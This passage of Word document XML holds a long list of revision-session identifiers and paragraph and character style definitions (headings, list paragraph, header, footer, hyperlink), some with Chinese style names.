    <w:rsid w:val="00D35FC3"/>
    <w:rsid w:val="00D36597"/>
    <w:rsid w:val="00D3697F"/>
    <w:rsid w:val="00D36C78"/>
    <w:rsid w:val="00D40882"/>
    <w:rsid w:val="00D417DB"/>
    <w:rsid w:val="00D417FD"/>
    <w:rsid w:val="00D42809"/>
    <w:rsid w:val="00D42A98"/>
    <w:rsid w:val="00D432DF"/>
    <w:rsid w:val="00D439B8"/>
    <w:rsid w:val="00D4470B"/>
    <w:rsid w:val="00D44C30"/>
    <w:rsid w:val="00D46067"/>
    <w:rsid w:val="00D46132"/>
    <w:rsid w:val="00D47463"/>
    <w:rsid w:val="00D477F8"/>
    <w:rsid w:val="00D47DB5"/>
    <w:rsid w:val="00D510F9"/>
    <w:rsid w:val="00D51169"/>
    <w:rsid w:val="00D51BCD"/>
    <w:rsid w:val="00D52A48"/>
    <w:rsid w:val="00D52C83"/>
    <w:rsid w:val="00D53B33"/>
    <w:rsid w:val="00D5433C"/>
    <w:rsid w:val="00D561F1"/>
    <w:rsid w:val="00D56227"/>
    <w:rsid w:val="00D56883"/>
    <w:rsid w:val="00D5779E"/>
    <w:rsid w:val="00D57CDE"/>
    <w:rsid w:val="00D60537"/>
    <w:rsid w:val="00D6093A"/>
    <w:rsid w:val="00D617D7"/>
    <w:rsid w:val="00D625B5"/>
    <w:rsid w:val="00D627E7"/>
    <w:rsid w:val="00D62AB3"/>
    <w:rsid w:val="00D63189"/>
    <w:rsid w:val="00D63FB4"/>
    <w:rsid w:val="00D653F9"/>
    <w:rsid w:val="00D65602"/>
    <w:rsid w:val="00D65752"/>
    <w:rsid w:val="00D65E45"/>
    <w:rsid w:val="00D6708F"/>
    <w:rsid w:val="00D706B6"/>
    <w:rsid w:val="00D70B17"/>
    <w:rsid w:val="00D70D1A"/>
    <w:rsid w:val="00D71664"/>
    <w:rsid w:val="00D72374"/>
    <w:rsid w:val="00D73747"/>
    <w:rsid w:val="00D73831"/>
    <w:rsid w:val="00D76088"/>
    <w:rsid w:val="00D7614D"/>
    <w:rsid w:val="00D76D20"/>
    <w:rsid w:val="00D770CE"/>
    <w:rsid w:val="00D8171C"/>
    <w:rsid w:val="00D82171"/>
    <w:rsid w:val="00D82BE2"/>
    <w:rsid w:val="00D83BA0"/>
    <w:rsid w:val="00D83D57"/>
    <w:rsid w:val="00D84503"/>
    <w:rsid w:val="00D84D13"/>
    <w:rsid w:val="00D85546"/>
    <w:rsid w:val="00D85C7A"/>
    <w:rsid w:val="00D866AF"/>
    <w:rsid w:val="00D87000"/>
    <w:rsid w:val="00D87AFA"/>
    <w:rsid w:val="00D90243"/>
    <w:rsid w:val="00D912F4"/>
    <w:rsid w:val="00D915CF"/>
    <w:rsid w:val="00D92CFB"/>
    <w:rsid w:val="00D93C64"/>
    <w:rsid w:val="00D942DF"/>
    <w:rsid w:val="00D95FEC"/>
    <w:rsid w:val="00D961D2"/>
    <w:rsid w:val="00D9682F"/>
    <w:rsid w:val="00D96A23"/>
    <w:rsid w:val="00D976AB"/>
    <w:rsid w:val="00D978DF"/>
    <w:rsid w:val="00DA20CF"/>
    <w:rsid w:val="00DA26DA"/>
    <w:rsid w:val="00DA285D"/>
    <w:rsid w:val="00DA28DF"/>
    <w:rsid w:val="00DA29F2"/>
    <w:rsid w:val="00DA3EB1"/>
    <w:rsid w:val="00DA4D8C"/>
    <w:rsid w:val="00DA4E91"/>
    <w:rsid w:val="00DA5126"/>
    <w:rsid w:val="00DA54D7"/>
    <w:rsid w:val="00DA5A17"/>
    <w:rsid w:val="00DA5AE0"/>
    <w:rsid w:val="00DA7849"/>
    <w:rsid w:val="00DB030F"/>
    <w:rsid w:val="00DB0836"/>
    <w:rsid w:val="00DB0ED7"/>
    <w:rsid w:val="00DB1192"/>
    <w:rsid w:val="00DB1680"/>
    <w:rsid w:val="00DB21B8"/>
    <w:rsid w:val="00DB2206"/>
    <w:rsid w:val="00DB35DB"/>
    <w:rsid w:val="00DB3B95"/>
    <w:rsid w:val="00DB412B"/>
    <w:rsid w:val="00DB4319"/>
    <w:rsid w:val="00DB57ED"/>
    <w:rsid w:val="00DB7AB9"/>
    <w:rsid w:val="00DB7D1F"/>
    <w:rsid w:val="00DC002F"/>
    <w:rsid w:val="00DC02AC"/>
    <w:rsid w:val="00DC02DB"/>
    <w:rsid w:val="00DC0570"/>
    <w:rsid w:val="00DC19E8"/>
    <w:rsid w:val="00DC1CE8"/>
    <w:rsid w:val="00DC278D"/>
    <w:rsid w:val="00DC2DBD"/>
    <w:rsid w:val="00DC491A"/>
    <w:rsid w:val="00DC5099"/>
    <w:rsid w:val="00DC5A1F"/>
    <w:rsid w:val="00DC6E06"/>
    <w:rsid w:val="00DC73BE"/>
    <w:rsid w:val="00DD0125"/>
    <w:rsid w:val="00DD09D9"/>
    <w:rsid w:val="00DD158D"/>
    <w:rsid w:val="00DD1B62"/>
    <w:rsid w:val="00DD231C"/>
    <w:rsid w:val="00DD2B94"/>
    <w:rsid w:val="00DD2E83"/>
    <w:rsid w:val="00DD2F5F"/>
    <w:rsid w:val="00DD363C"/>
    <w:rsid w:val="00DD3DCC"/>
    <w:rsid w:val="00DD44A4"/>
    <w:rsid w:val="00DD4B7A"/>
    <w:rsid w:val="00DD51AA"/>
    <w:rsid w:val="00DD5392"/>
    <w:rsid w:val="00DD6166"/>
    <w:rsid w:val="00DE01CC"/>
    <w:rsid w:val="00DE1F4D"/>
    <w:rsid w:val="00DE2555"/>
    <w:rsid w:val="00DE259A"/>
    <w:rsid w:val="00DE25E8"/>
    <w:rsid w:val="00DE3B6D"/>
    <w:rsid w:val="00DE4F3B"/>
    <w:rsid w:val="00DE551D"/>
    <w:rsid w:val="00DE5C45"/>
    <w:rsid w:val="00DE66F6"/>
    <w:rsid w:val="00DE6C8E"/>
    <w:rsid w:val="00DE6CA5"/>
    <w:rsid w:val="00DE6F34"/>
    <w:rsid w:val="00DF28B0"/>
    <w:rsid w:val="00DF3BAA"/>
    <w:rsid w:val="00DF44AE"/>
    <w:rsid w:val="00DF4662"/>
    <w:rsid w:val="00DF4A9A"/>
    <w:rsid w:val="00DF52B3"/>
    <w:rsid w:val="00DF5302"/>
    <w:rsid w:val="00DF55C6"/>
    <w:rsid w:val="00DF561D"/>
    <w:rsid w:val="00DF57DB"/>
    <w:rsid w:val="00DF6195"/>
    <w:rsid w:val="00DF62FB"/>
    <w:rsid w:val="00DF73BA"/>
    <w:rsid w:val="00DF755E"/>
    <w:rsid w:val="00DF76B3"/>
    <w:rsid w:val="00E004A7"/>
    <w:rsid w:val="00E00B49"/>
    <w:rsid w:val="00E0116B"/>
    <w:rsid w:val="00E01B51"/>
    <w:rsid w:val="00E04B89"/>
    <w:rsid w:val="00E04D65"/>
    <w:rsid w:val="00E04D8C"/>
    <w:rsid w:val="00E05284"/>
    <w:rsid w:val="00E05F81"/>
    <w:rsid w:val="00E066BF"/>
    <w:rsid w:val="00E06932"/>
    <w:rsid w:val="00E0752F"/>
    <w:rsid w:val="00E0792C"/>
    <w:rsid w:val="00E10551"/>
    <w:rsid w:val="00E10795"/>
    <w:rsid w:val="00E115E1"/>
    <w:rsid w:val="00E129CB"/>
    <w:rsid w:val="00E12CE0"/>
    <w:rsid w:val="00E12FDB"/>
    <w:rsid w:val="00E13436"/>
    <w:rsid w:val="00E13C32"/>
    <w:rsid w:val="00E14A26"/>
    <w:rsid w:val="00E14B2D"/>
    <w:rsid w:val="00E164DD"/>
    <w:rsid w:val="00E1699B"/>
    <w:rsid w:val="00E16C7B"/>
    <w:rsid w:val="00E16DBB"/>
    <w:rsid w:val="00E16F16"/>
    <w:rsid w:val="00E20534"/>
    <w:rsid w:val="00E205C8"/>
    <w:rsid w:val="00E20DF9"/>
    <w:rsid w:val="00E20E57"/>
    <w:rsid w:val="00E210E2"/>
    <w:rsid w:val="00E23B8E"/>
    <w:rsid w:val="00E23FCA"/>
    <w:rsid w:val="00E24A98"/>
    <w:rsid w:val="00E24D69"/>
    <w:rsid w:val="00E24F24"/>
    <w:rsid w:val="00E24FC9"/>
    <w:rsid w:val="00E2578C"/>
    <w:rsid w:val="00E25A24"/>
    <w:rsid w:val="00E25B22"/>
    <w:rsid w:val="00E25F09"/>
    <w:rsid w:val="00E273F0"/>
    <w:rsid w:val="00E30565"/>
    <w:rsid w:val="00E30F94"/>
    <w:rsid w:val="00E3152D"/>
    <w:rsid w:val="00E33DD8"/>
    <w:rsid w:val="00E3498F"/>
    <w:rsid w:val="00E34A6D"/>
    <w:rsid w:val="00E35009"/>
    <w:rsid w:val="00E353C9"/>
    <w:rsid w:val="00E355DE"/>
    <w:rsid w:val="00E36144"/>
    <w:rsid w:val="00E36983"/>
    <w:rsid w:val="00E3698A"/>
    <w:rsid w:val="00E36FA9"/>
    <w:rsid w:val="00E378E4"/>
    <w:rsid w:val="00E37953"/>
    <w:rsid w:val="00E37FE7"/>
    <w:rsid w:val="00E41A78"/>
    <w:rsid w:val="00E44201"/>
    <w:rsid w:val="00E44220"/>
    <w:rsid w:val="00E44582"/>
    <w:rsid w:val="00E467B6"/>
    <w:rsid w:val="00E47081"/>
    <w:rsid w:val="00E47270"/>
    <w:rsid w:val="00E47BEA"/>
    <w:rsid w:val="00E47FDC"/>
    <w:rsid w:val="00E51AC6"/>
    <w:rsid w:val="00E51ACF"/>
    <w:rsid w:val="00E5226C"/>
    <w:rsid w:val="00E52CCB"/>
    <w:rsid w:val="00E541CA"/>
    <w:rsid w:val="00E54239"/>
    <w:rsid w:val="00E546DB"/>
    <w:rsid w:val="00E54DA1"/>
    <w:rsid w:val="00E54DC3"/>
    <w:rsid w:val="00E55CB6"/>
    <w:rsid w:val="00E55CF0"/>
    <w:rsid w:val="00E56656"/>
    <w:rsid w:val="00E56C54"/>
    <w:rsid w:val="00E56D4B"/>
    <w:rsid w:val="00E575AB"/>
    <w:rsid w:val="00E57776"/>
    <w:rsid w:val="00E579A7"/>
    <w:rsid w:val="00E57FB5"/>
    <w:rsid w:val="00E60C5F"/>
    <w:rsid w:val="00E60CAA"/>
    <w:rsid w:val="00E62FD5"/>
    <w:rsid w:val="00E639C3"/>
    <w:rsid w:val="00E63A07"/>
    <w:rsid w:val="00E64748"/>
    <w:rsid w:val="00E64957"/>
    <w:rsid w:val="00E64E39"/>
    <w:rsid w:val="00E64E8F"/>
    <w:rsid w:val="00E6562D"/>
    <w:rsid w:val="00E657B0"/>
    <w:rsid w:val="00E65B26"/>
    <w:rsid w:val="00E6670F"/>
    <w:rsid w:val="00E70504"/>
    <w:rsid w:val="00E71278"/>
    <w:rsid w:val="00E71CA3"/>
    <w:rsid w:val="00E71E0A"/>
    <w:rsid w:val="00E72097"/>
    <w:rsid w:val="00E725A7"/>
    <w:rsid w:val="00E727DC"/>
    <w:rsid w:val="00E72B5D"/>
    <w:rsid w:val="00E72E13"/>
    <w:rsid w:val="00E7336C"/>
    <w:rsid w:val="00E73FCB"/>
    <w:rsid w:val="00E74B53"/>
    <w:rsid w:val="00E7624B"/>
    <w:rsid w:val="00E76285"/>
    <w:rsid w:val="00E768CE"/>
    <w:rsid w:val="00E77307"/>
    <w:rsid w:val="00E776B6"/>
    <w:rsid w:val="00E807FA"/>
    <w:rsid w:val="00E823E7"/>
    <w:rsid w:val="00E82DC3"/>
    <w:rsid w:val="00E839D1"/>
    <w:rsid w:val="00E84397"/>
    <w:rsid w:val="00E84574"/>
    <w:rsid w:val="00E846A4"/>
    <w:rsid w:val="00E8492E"/>
    <w:rsid w:val="00E84991"/>
    <w:rsid w:val="00E87D9C"/>
    <w:rsid w:val="00E9087E"/>
    <w:rsid w:val="00E90FC0"/>
    <w:rsid w:val="00E91476"/>
    <w:rsid w:val="00E91CF3"/>
    <w:rsid w:val="00E91E5F"/>
    <w:rsid w:val="00E924D9"/>
    <w:rsid w:val="00E934FB"/>
    <w:rsid w:val="00E948F0"/>
    <w:rsid w:val="00E95B56"/>
    <w:rsid w:val="00E95CC2"/>
    <w:rsid w:val="00E95E2F"/>
    <w:rsid w:val="00E95EC2"/>
    <w:rsid w:val="00E96286"/>
    <w:rsid w:val="00E969B1"/>
    <w:rsid w:val="00E96BF8"/>
    <w:rsid w:val="00E96D8E"/>
    <w:rsid w:val="00E9716E"/>
    <w:rsid w:val="00E97300"/>
    <w:rsid w:val="00E97483"/>
    <w:rsid w:val="00E97A52"/>
    <w:rsid w:val="00E97DF2"/>
    <w:rsid w:val="00EA1CB5"/>
    <w:rsid w:val="00EA1FA6"/>
    <w:rsid w:val="00EA20D2"/>
    <w:rsid w:val="00EA2F87"/>
    <w:rsid w:val="00EA32AC"/>
    <w:rsid w:val="00EA380F"/>
    <w:rsid w:val="00EA43A1"/>
    <w:rsid w:val="00EA5D0F"/>
    <w:rsid w:val="00EA6C45"/>
    <w:rsid w:val="00EB0EBD"/>
    <w:rsid w:val="00EB102E"/>
    <w:rsid w:val="00EB1111"/>
    <w:rsid w:val="00EB1EB5"/>
    <w:rsid w:val="00EB2023"/>
    <w:rsid w:val="00EB2258"/>
    <w:rsid w:val="00EB30AE"/>
    <w:rsid w:val="00EB314C"/>
    <w:rsid w:val="00EB46D6"/>
    <w:rsid w:val="00EB4A4B"/>
    <w:rsid w:val="00EB6414"/>
    <w:rsid w:val="00EB68D5"/>
    <w:rsid w:val="00EC0785"/>
    <w:rsid w:val="00EC0BE7"/>
    <w:rsid w:val="00EC1285"/>
    <w:rsid w:val="00EC15F8"/>
    <w:rsid w:val="00EC22BF"/>
    <w:rsid w:val="00EC2F4F"/>
    <w:rsid w:val="00EC3129"/>
    <w:rsid w:val="00EC31CD"/>
    <w:rsid w:val="00EC4BF5"/>
    <w:rsid w:val="00EC548B"/>
    <w:rsid w:val="00EC54BE"/>
    <w:rsid w:val="00EC576B"/>
    <w:rsid w:val="00EC5E54"/>
    <w:rsid w:val="00EC661A"/>
    <w:rsid w:val="00EC727E"/>
    <w:rsid w:val="00ED05EB"/>
    <w:rsid w:val="00ED091D"/>
    <w:rsid w:val="00ED0BCD"/>
    <w:rsid w:val="00ED12D5"/>
    <w:rsid w:val="00ED1559"/>
    <w:rsid w:val="00ED1D14"/>
    <w:rsid w:val="00ED21D8"/>
    <w:rsid w:val="00ED2683"/>
    <w:rsid w:val="00ED29BD"/>
    <w:rsid w:val="00ED2D7A"/>
    <w:rsid w:val="00ED3D0C"/>
    <w:rsid w:val="00ED5A5C"/>
    <w:rsid w:val="00ED5FA1"/>
    <w:rsid w:val="00ED6036"/>
    <w:rsid w:val="00ED6B36"/>
    <w:rsid w:val="00EE184C"/>
    <w:rsid w:val="00EE2501"/>
    <w:rsid w:val="00EE4182"/>
    <w:rsid w:val="00EE426C"/>
    <w:rsid w:val="00EE43F5"/>
    <w:rsid w:val="00EE4EFB"/>
    <w:rsid w:val="00EE54B7"/>
    <w:rsid w:val="00EE5AB1"/>
    <w:rsid w:val="00EE618C"/>
    <w:rsid w:val="00EE6293"/>
    <w:rsid w:val="00EE7301"/>
    <w:rsid w:val="00EE7973"/>
    <w:rsid w:val="00EE7992"/>
    <w:rsid w:val="00EF00CD"/>
    <w:rsid w:val="00EF015E"/>
    <w:rsid w:val="00EF132E"/>
    <w:rsid w:val="00EF2A5A"/>
    <w:rsid w:val="00EF3C53"/>
    <w:rsid w:val="00EF4FE3"/>
    <w:rsid w:val="00EF591C"/>
    <w:rsid w:val="00EF5991"/>
    <w:rsid w:val="00EF734B"/>
    <w:rsid w:val="00EF739D"/>
    <w:rsid w:val="00EF7F66"/>
    <w:rsid w:val="00F0046F"/>
    <w:rsid w:val="00F00E2B"/>
    <w:rsid w:val="00F01694"/>
    <w:rsid w:val="00F01D1F"/>
    <w:rsid w:val="00F02533"/>
    <w:rsid w:val="00F03D4D"/>
    <w:rsid w:val="00F05DFD"/>
    <w:rsid w:val="00F0651D"/>
    <w:rsid w:val="00F07681"/>
    <w:rsid w:val="00F10244"/>
    <w:rsid w:val="00F10401"/>
    <w:rsid w:val="00F10914"/>
    <w:rsid w:val="00F111A8"/>
    <w:rsid w:val="00F116E5"/>
    <w:rsid w:val="00F11B49"/>
    <w:rsid w:val="00F121B5"/>
    <w:rsid w:val="00F12587"/>
    <w:rsid w:val="00F1263B"/>
    <w:rsid w:val="00F14476"/>
    <w:rsid w:val="00F144C5"/>
    <w:rsid w:val="00F150C2"/>
    <w:rsid w:val="00F1551C"/>
    <w:rsid w:val="00F1732A"/>
    <w:rsid w:val="00F177B2"/>
    <w:rsid w:val="00F20BF1"/>
    <w:rsid w:val="00F20C63"/>
    <w:rsid w:val="00F2191C"/>
    <w:rsid w:val="00F21E49"/>
    <w:rsid w:val="00F223B0"/>
    <w:rsid w:val="00F23041"/>
    <w:rsid w:val="00F23B3E"/>
    <w:rsid w:val="00F24729"/>
    <w:rsid w:val="00F24D31"/>
    <w:rsid w:val="00F25370"/>
    <w:rsid w:val="00F25756"/>
    <w:rsid w:val="00F26137"/>
    <w:rsid w:val="00F26E3B"/>
    <w:rsid w:val="00F27C8D"/>
    <w:rsid w:val="00F27F00"/>
    <w:rsid w:val="00F30287"/>
    <w:rsid w:val="00F30AF9"/>
    <w:rsid w:val="00F31BA2"/>
    <w:rsid w:val="00F32669"/>
    <w:rsid w:val="00F33C4D"/>
    <w:rsid w:val="00F34915"/>
    <w:rsid w:val="00F34CF0"/>
    <w:rsid w:val="00F35296"/>
    <w:rsid w:val="00F35D84"/>
    <w:rsid w:val="00F36503"/>
    <w:rsid w:val="00F366ED"/>
    <w:rsid w:val="00F37368"/>
    <w:rsid w:val="00F37684"/>
    <w:rsid w:val="00F405BD"/>
    <w:rsid w:val="00F40E76"/>
    <w:rsid w:val="00F40FF4"/>
    <w:rsid w:val="00F41761"/>
    <w:rsid w:val="00F41887"/>
    <w:rsid w:val="00F41A4C"/>
    <w:rsid w:val="00F4213B"/>
    <w:rsid w:val="00F42E65"/>
    <w:rsid w:val="00F43407"/>
    <w:rsid w:val="00F43611"/>
    <w:rsid w:val="00F436B6"/>
    <w:rsid w:val="00F43A2F"/>
    <w:rsid w:val="00F43EEA"/>
    <w:rsid w:val="00F4466E"/>
    <w:rsid w:val="00F44E9F"/>
    <w:rsid w:val="00F44ECC"/>
    <w:rsid w:val="00F464BB"/>
    <w:rsid w:val="00F47DDA"/>
    <w:rsid w:val="00F47EC5"/>
    <w:rsid w:val="00F501FE"/>
    <w:rsid w:val="00F512D8"/>
    <w:rsid w:val="00F51F4C"/>
    <w:rsid w:val="00F531F0"/>
    <w:rsid w:val="00F53823"/>
    <w:rsid w:val="00F54421"/>
    <w:rsid w:val="00F54E13"/>
    <w:rsid w:val="00F553E1"/>
    <w:rsid w:val="00F56527"/>
    <w:rsid w:val="00F57476"/>
    <w:rsid w:val="00F607E0"/>
    <w:rsid w:val="00F6091A"/>
    <w:rsid w:val="00F619DF"/>
    <w:rsid w:val="00F621E5"/>
    <w:rsid w:val="00F6249E"/>
    <w:rsid w:val="00F627B0"/>
    <w:rsid w:val="00F627EF"/>
    <w:rsid w:val="00F629E0"/>
    <w:rsid w:val="00F6306D"/>
    <w:rsid w:val="00F63A82"/>
    <w:rsid w:val="00F646A5"/>
    <w:rsid w:val="00F64839"/>
    <w:rsid w:val="00F64B2F"/>
    <w:rsid w:val="00F67188"/>
    <w:rsid w:val="00F67FDD"/>
    <w:rsid w:val="00F70D36"/>
    <w:rsid w:val="00F7126A"/>
    <w:rsid w:val="00F716CC"/>
    <w:rsid w:val="00F72422"/>
    <w:rsid w:val="00F72CE3"/>
    <w:rsid w:val="00F72FA5"/>
    <w:rsid w:val="00F73796"/>
    <w:rsid w:val="00F73BE6"/>
    <w:rsid w:val="00F74018"/>
    <w:rsid w:val="00F75154"/>
    <w:rsid w:val="00F771FB"/>
    <w:rsid w:val="00F779F5"/>
    <w:rsid w:val="00F77CCF"/>
    <w:rsid w:val="00F80A3E"/>
    <w:rsid w:val="00F80DF6"/>
    <w:rsid w:val="00F81963"/>
    <w:rsid w:val="00F82509"/>
    <w:rsid w:val="00F8298B"/>
    <w:rsid w:val="00F8562E"/>
    <w:rsid w:val="00F85B99"/>
    <w:rsid w:val="00F86DA6"/>
    <w:rsid w:val="00F8704D"/>
    <w:rsid w:val="00F87689"/>
    <w:rsid w:val="00F876BA"/>
    <w:rsid w:val="00F876ED"/>
    <w:rsid w:val="00F87F65"/>
    <w:rsid w:val="00F90150"/>
    <w:rsid w:val="00F904FD"/>
    <w:rsid w:val="00F9206A"/>
    <w:rsid w:val="00F92975"/>
    <w:rsid w:val="00F9298A"/>
    <w:rsid w:val="00F930A0"/>
    <w:rsid w:val="00F93262"/>
    <w:rsid w:val="00F93415"/>
    <w:rsid w:val="00F93F5F"/>
    <w:rsid w:val="00F9425F"/>
    <w:rsid w:val="00F94795"/>
    <w:rsid w:val="00F94E04"/>
    <w:rsid w:val="00F957AB"/>
    <w:rsid w:val="00F96359"/>
    <w:rsid w:val="00F96FAE"/>
    <w:rsid w:val="00F970BE"/>
    <w:rsid w:val="00F97557"/>
    <w:rsid w:val="00F97DB3"/>
    <w:rsid w:val="00FA0925"/>
    <w:rsid w:val="00FA11D8"/>
    <w:rsid w:val="00FA16A3"/>
    <w:rsid w:val="00FA17FE"/>
    <w:rsid w:val="00FA2CD5"/>
    <w:rsid w:val="00FA351D"/>
    <w:rsid w:val="00FA3E0D"/>
    <w:rsid w:val="00FA4708"/>
    <w:rsid w:val="00FA488D"/>
    <w:rsid w:val="00FA50CD"/>
    <w:rsid w:val="00FA5A35"/>
    <w:rsid w:val="00FA6905"/>
    <w:rsid w:val="00FA6D7F"/>
    <w:rsid w:val="00FA73FA"/>
    <w:rsid w:val="00FB0C25"/>
    <w:rsid w:val="00FB0F20"/>
    <w:rsid w:val="00FB12A2"/>
    <w:rsid w:val="00FB1332"/>
    <w:rsid w:val="00FB3104"/>
    <w:rsid w:val="00FB495C"/>
    <w:rsid w:val="00FB4ABA"/>
    <w:rsid w:val="00FB4ADB"/>
    <w:rsid w:val="00FB65B2"/>
    <w:rsid w:val="00FB6B68"/>
    <w:rsid w:val="00FB6EDD"/>
    <w:rsid w:val="00FB6FFB"/>
    <w:rsid w:val="00FC130B"/>
    <w:rsid w:val="00FC238A"/>
    <w:rsid w:val="00FC305F"/>
    <w:rsid w:val="00FC32F9"/>
    <w:rsid w:val="00FC36AD"/>
    <w:rsid w:val="00FC48A6"/>
    <w:rsid w:val="00FC49C9"/>
    <w:rsid w:val="00FC5045"/>
    <w:rsid w:val="00FC505D"/>
    <w:rsid w:val="00FC5374"/>
    <w:rsid w:val="00FC59E4"/>
    <w:rsid w:val="00FC679D"/>
    <w:rsid w:val="00FC7E36"/>
    <w:rsid w:val="00FD0216"/>
    <w:rsid w:val="00FD246B"/>
    <w:rsid w:val="00FD26D4"/>
    <w:rsid w:val="00FD291D"/>
    <w:rsid w:val="00FD3322"/>
    <w:rsid w:val="00FD34A9"/>
    <w:rsid w:val="00FD3DFD"/>
    <w:rsid w:val="00FD4358"/>
    <w:rsid w:val="00FD44D7"/>
    <w:rsid w:val="00FD5327"/>
    <w:rsid w:val="00FD73D8"/>
    <w:rsid w:val="00FD7951"/>
    <w:rsid w:val="00FE005D"/>
    <w:rsid w:val="00FE00C7"/>
    <w:rsid w:val="00FE0891"/>
    <w:rsid w:val="00FE0F01"/>
    <w:rsid w:val="00FE2649"/>
    <w:rsid w:val="00FE28F5"/>
    <w:rsid w:val="00FE30BE"/>
    <w:rsid w:val="00FE3A85"/>
    <w:rsid w:val="00FE3CD0"/>
    <w:rsid w:val="00FE5E04"/>
    <w:rsid w:val="00FE6A56"/>
    <w:rsid w:val="00FE6B3E"/>
    <w:rsid w:val="00FE705E"/>
    <w:rsid w:val="00FE74CC"/>
    <w:rsid w:val="00FE779B"/>
    <w:rsid w:val="00FE7D76"/>
    <w:rsid w:val="00FE7DA0"/>
    <w:rsid w:val="00FF12F2"/>
    <w:rsid w:val="00FF3D5F"/>
    <w:rsid w:val="00FF3F7D"/>
    <w:rsid w:val="00FF448B"/>
    <w:rsid w:val="00FF5087"/>
    <w:rsid w:val="00FF5447"/>
    <w:rsid w:val="00FF7AA9"/>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E609722D-2250-4261-89EE-8797F6D5DB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CC4BCA"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FF3D5F"/>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FF3D5F"/>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D961D2"/>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A65BFF"/>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8A489C"/>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FF3D5F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FF3D5F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D961D2"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D961D2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE5AB1"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EE5AB1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE5AB1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00EE5AB1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A13551"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00323904"/>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7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00323904"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00323904"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00323904"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D83D57"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
